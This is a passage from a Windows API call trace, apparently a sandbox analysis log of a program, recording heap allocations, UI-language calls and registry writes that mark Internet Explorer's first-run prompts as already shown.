dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.491] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef690 | out: hHeap=0x490000) returned 1 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4ef920 [0048.496] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc40 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.496] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4ef3b8 [0048.497] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef818 [0048.497] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.497] SetLastError (dwErrCode=0x0) [0048.498] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9868 [0048.498] SetLastError (dwErrCode=0x0) [0048.498] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9868, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9868, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.498] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9868 | out: hHeap=0x490000) returned 1 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d02c8 [0048.498] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d02c8, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.498] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.498] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.499] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.499] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc18 [0048.501] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.501] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f9c48 [0048.501] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.502] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa3c8 [0048.503] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa748 [0048.503] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa3c8 | out: hHeap=0x490000) returned 1 [0048.503] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4fa940 [0048.504] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa748 | out: hHeap=0x490000) returned 1 [0048.505] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f9c48 | out: hHeap=0x490000) returned 1 [0048.505] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x54) returned 0x4e0050 [0048.505] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x3e) returned 0x4bbf18 [0048.506] GetTickCount () returned 0x19f5690 [0048.506] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0xcdf0b4 | out: phkResult=0xcdf0b4*=0x204) returned 0x0 [0048.506] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x40) returned 0x4bbf60 [0048.506] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ddd18 [0048.506] SafeArrayGetElemsize (psa=0x4ddd58) returned 0x1 [0048.506] SafeArrayAccessData (in: psa=0x4ddd58, ppvData=0xcdef00 | out: ppvData=0xcdef00) returned 0x0 [0048.506] memcpy (in: _Dst=0x4c9868, _Src=0x4f10e6, _Size=0x8 | out: _Dst=0x4c9868) returned 0x4c9868 [0048.506] SafeArrayUnaccessData (psa=0x4ddd58) returned 0x0 [0048.507] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddd18 | out: hHeap=0x490000) returned 1 [0048.508] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bbf60 | out: hHeap=0x490000) returned 1 [0048.508] RegSetValueExW (hKey=0x204, lpValueName="IE10RunOnceLastShown_TIMESTAMP", Reserved=0x0, dwType=0x3, lpData=0x4c9868, cbData=0x8) returned 0x0 [0048.508] RegCloseKey (hKey=0x204) returned 0x0 [0048.510] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bbf18 | out: hHeap=0x490000) returned 1 [0048.511] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0050 | out: hHeap=0x490000) returned 1 [0048.511] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa940 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc18 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.512] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.513] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.513] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9898 [0048.513] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c9898, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.513] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9898 | out: hHeap=0x490000) returned 1 [0048.513] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.513] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc40 | out: hHeap=0x490000) returned 1 [0048.513] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.514] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.515] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef3b8 | out: hHeap=0x490000) returned 1 [0048.515] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.516] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef818 | out: hHeap=0x490000) returned 1 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4ef920 [0048.521] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc40 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.521] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4ef3b8 [0048.522] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef818 [0048.522] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.523] SetLastError (dwErrCode=0x0) [0048.523] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.523] SetLastError (dwErrCode=0x0) [0048.523] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9898 [0048.523] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d00e8 [0048.523] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d00e8, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.523] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.523] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.524] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.524] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.524] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.524] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc18 [0048.526] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.527] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f9c40 [0048.527] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.527] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa3c0 [0048.527] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa740 [0048.528] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa3c0 | out: hHeap=0x490000) returned 1 [0048.528] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4fa938 [0048.529] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa740 | out: hHeap=0x490000) returned 1 [0048.529] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f9c40 | out: hHeap=0x490000) returned 1 [0048.529] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x54) returned 0x4e0050 [0048.529] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4ddd18 [0048.530] GetTickCount () returned 0x19f56af [0048.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0xcdf160 | out: phkResult=0xcdf160*=0x20c) returned 0x0 [0048.531] RegSetValueExW (hKey=0x20c, lpValueName="IE8RunOnceLastShown", Reserved=0x0, dwType=0x4, lpData=0xcdf0fc, cbData=0x4) returned 0x0 [0048.531] RegCloseKey (hKey=0x20c) returned 0x0 [0048.533] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddd18 | out: hHeap=0x490000) returned 1 [0048.534] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0050 | out: hHeap=0x490000) returned 1 [0048.534] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa938 | out: hHeap=0x490000) returned 1 [0048.534] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc18 | out: hHeap=0x490000) returned 1 [0048.534] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.534] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.535] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9888 [0048.535] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c9888, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.535] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9898 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc40 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.536] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.537] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef3b8 | out: hHeap=0x490000) returned 1 [0048.538] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.538] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef818 | out: hHeap=0x490000) returned 1 [0048.543] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.543] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4ef920 [0048.544] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4d55f0 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4ef3b8 [0048.544] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef818 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.545] SetLastError (dwErrCode=0x0) [0048.545] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9898 [0048.545] SetLastError (dwErrCode=0x0) [0048.545] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9898, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9898, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.545] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9898 | out: hHeap=0x490000) returned 1 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d0228 [0048.545] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d0228, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.545] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.546] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc40 [0048.548] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.549] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f9c48 [0048.549] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.549] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa3c8 [0048.550] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fa748 [0048.550] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa3c8 | out: hHeap=0x490000) returned 1 [0048.551] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4fa940 [0048.551] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa748 | out: hHeap=0x490000) returned 1 [0048.552] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f9c48 | out: hHeap=0x490000) returned 1 [0048.552] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x54) returned 0x4e0050 [0048.552] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x3c) returned 0x4f1400 [0048.553] GetTickCount () returned 0x19f56bf [0048.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0xcdf0b4 | out: phkResult=0xcdf0b4*=0x204) returned 0x0 [0048.553] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x40) returned 0x4f1448 [0048.553] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ddd18 [0048.553] SafeArrayGetElemsize (psa=0x4ddd88) returned 0x1 [0048.553] SafeArrayAccessData (in: psa=0x4ddd88, ppvData=0xcdef00 | out: ppvData=0xcdef00) returned 0x0 [0048.553] memcpy (in: _Dst=0x4c9898, _Src=0x4f10e5, _Size=0x8 | out: _Dst=0x4c9898) returned 0x4c9898 [0048.553] SafeArrayUnaccessData (psa=0x4ddd88) returned 0x0 [0048.554] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddd18 | out: hHeap=0x490000) returned 1 [0048.554] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f1448 | out: hHeap=0x490000) returned 1 [0048.554] RegSetValueExW (hKey=0x204, lpValueName="IE8RunOnceLastShown_TIMESTAMP", Reserved=0x0, dwType=0x3, lpData=0x4c9898, cbData=0x8) returned 0x0 [0048.555] RegCloseKey (hKey=0x204) returned 0x0 [0048.557] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f1400 | out: hHeap=0x490000) returned 1 [0048.557] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0050 | out: hHeap=0x490000) returned 1 [0048.558] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fa940 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc40 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.559] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.560] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.560] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.560] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c98a8 [0048.560] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c98a8, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.560] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c98a8 | out: hHeap=0x490000) returned 1 [0048.560] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.561] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d55f0 | out: hHeap=0x490000) returned 1 [0048.561] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.561] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.562] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.562] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.562] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.562] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.562] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.563] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef3b8 | out: hHeap=0x490000) returned 1 [0048.564] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.564] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef818 | out: hHeap=0x490000) returned 1 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4ef920 [0048.570] HeapFree (in: hHeap=0x490000, 